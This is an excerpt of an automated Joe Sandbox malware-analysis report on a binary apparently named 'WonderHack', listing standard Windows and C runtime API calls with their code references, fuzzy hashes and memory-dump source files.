                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2ec9cc7a3e9b350dae88c8026901d868b03b69af8295fa6f5c82feb27cf2f00a
                                                                                                                                                                                                                                                                          • Instruction ID: d1adcca3b91be156c53a90a99df3e778d31a71f8f1667ba7b41ea247852a353c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ec9cc7a3e9b350dae88c8026901d868b03b69af8295fa6f5c82feb27cf2f00a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F001F5376042255F8F0A8FACEC40B9E3769FBC5330F254125F7108B056DA30E801AB81
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3988221542-0
                                                                                                                                                                                                                                                                          • Opcode ID: a29678f153cd2beab0646b7bd0ea8ddbd1a43a5e5fcd0d7a03e528db0a12a6f2
                                                                                                                                                                                                                                                                          • Instruction ID: bbf127764190f208fa80cfc2583581e79972a9c4e40206f44e8c1ee5ff6d610d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29678f153cd2beab0646b7bd0ea8ddbd1a43a5e5fcd0d7a03e528db0a12a6f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C0126366086935BCB158BBCE8797A8BB50FF4333CF20416FF012954D1CB225A10E360
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CA22A9,?,?,00C93E32,00001000,?,00C93D7A), ref: 00CB31F3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 77e8de73e850b3c69e0bced16bd697459c2cb6e4fa55e20a9f9deb6a1ed471a7
                                                                                                                                                                                                                                                                          • Instruction ID: c2aa1f1338fe46da3346128e3f6835a51fbe9142d0cf236e6974a202fd513456
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77e8de73e850b3c69e0bced16bd697459c2cb6e4fa55e20a9f9deb6a1ed471a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E065311012B297DA21266ADC05BDE765CAB437A0F150121EC29D61D1DF61CF0191A5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00CA08F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                                          • Opcode ID: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                                                                                                                                                                                          • Instruction ID: 36921db8121417e62b8af20efaf6446017f4e9b245892866d890238cb12e6697
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1E04F30C0030CEBCF04EBA4E14546DB7B4AF81314F2041A9E84557351DB359E54DB95
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00C9BDD1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                                          • Opcode ID: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                                                                                                                                                                                          • Instruction ID: cbc1cd5bc3b747de00dbc0865f1d3909741aa7e6226be7011322bf38b9188e00
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE04630C0020CFBCF08EBA8E24949CBBB4AFC1304F1080A9E84967311DB31AE50DB81
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                          • Opcode ID: 0487a6129b622234748813b00ba79eb9446b1bf6456a3687a533312a257a8028
                                                                                                                                                                                                                                                                          • Instruction ID: 3cf86858b043d82cf1798ebdaee94367060b1462a207af5e79ce8ed5bf8a9204
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0487a6129b622234748813b00ba79eb9446b1bf6456a3687a533312a257a8028
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D22C71E082298FDB65CF28DD40BEAB7B5EB45305F1441EAD41DE7240EB78AE868F41
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00CB8515,00000002,00000000,?,?,?,00CB8515,?,00000000), ref: 00CB8BDD
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00CB8515,00000002,00000000,?,?,?,00CB8515,?,00000000), ref: 00CB8C06
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,00CB8515,?,00000000), ref: 00CB8C1B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: ef6b9f4bfd87e758c2bd17c5ab56939628ada7c8ca52bdd3a315a6479a779681
                                                                                                                                                                                                                                                                          • Instruction ID: faf7653861c2a496ac936093fa93869a71844ee8317ba9fd9eee69931ca2cfca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef6b9f4bfd87e758c2bd17c5ab56939628ada7c8ca52bdd3a315a6479a779681
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2721C1A2600100ABDB309F65CD41FD7B7AEAB54B60F5A8425E91ADB140EF32DF48D7A0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CB84E7
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00CB8525
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00CB8538
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CB8580
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CB859B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                                                          • Opcode ID: c070ba566d72c20ba58d89a86fc0664c18868c46e1c99b04419a460fdd20303f
                                                                                                                                                                                                                                                                          • Instruction ID: b99c0fa237097d79e73860816f9de7f098cd647b49981b14f21bc84e642e0d35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c070ba566d72c20ba58d89a86fc0664c18868c46e1c99b04419a460fdd20303f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81513D71A0020AABEF20DFA5CC55BEE77BCBF04700F184469E915E7191EB709A48DF61
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                          • Instruction ID: b464203d7dff4b04e502f39c5e5a06f138f138258b547fb9cc5fd814208ac05a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12022C71E012199FDF14CFA9D8906EEBBF1FF48314F688269E925E7340D731AA458B90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00CB9216
                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CB930A
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CB9349
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CB937C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1164774033-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5b2ba7fe96cab24ef80b5de75492890c0a49ec14c215b6fc0a4264b09d6f79ad
                                                                                                                                                                                                                                                                          • Instruction ID: 75e286c0016b056d5282005a8cc4744c93568e19d97f06791997b1f398e982ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b2ba7fe96cab24ef80b5de75492890c0a49ec14c215b6fc0a4264b09d6f79ad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C371E175D051696FDF20AF28CC8DBEEBBB8EB05300F1441D9E16D97251DA314E85AF10
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CA6534
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00CA6600
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CA6619
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00CA6623
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                                          • Opcode ID: 062cd489bad9b210dbbef8765a7b63c3c5440724ba10357844718a77b912958c
                                                                                                                                                                                                                                                                          • Instruction ID: f917aabebe963d65f105423dcf8e542169fcfb910e06432ef66f5c6e56b89655
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 062cd489bad9b210dbbef8765a7b63c3c5440724ba10357844718a77b912958c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1431F4B5D012199BDB20DFA4D949BCDBBB8BF08308F1041AAE40DAB250EB709B85DF45
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA7122
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CA7131
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00CA713A
                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00CA7147
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: a1790c29b5e3d7e8d7edef4305754fd0e03fbbdb4c6f4dbbda43bcf6d76dce65
                                                                                                                                                                                                                                                                          • Instruction ID: 7ef86b24d32c603e439a2e0d8f35a1baea574934c10aa693b66644d945332d26
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1790c29b5e3d7e8d7edef4305754fd0e03fbbdb4c6f4dbbda43bcf6d76dce65
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F06274D1120DEBCB00DBB4DA89A9EBBF4EF5C200B9145A5E412F7150EB30AB449B51
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB871F
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB8769
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB882F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
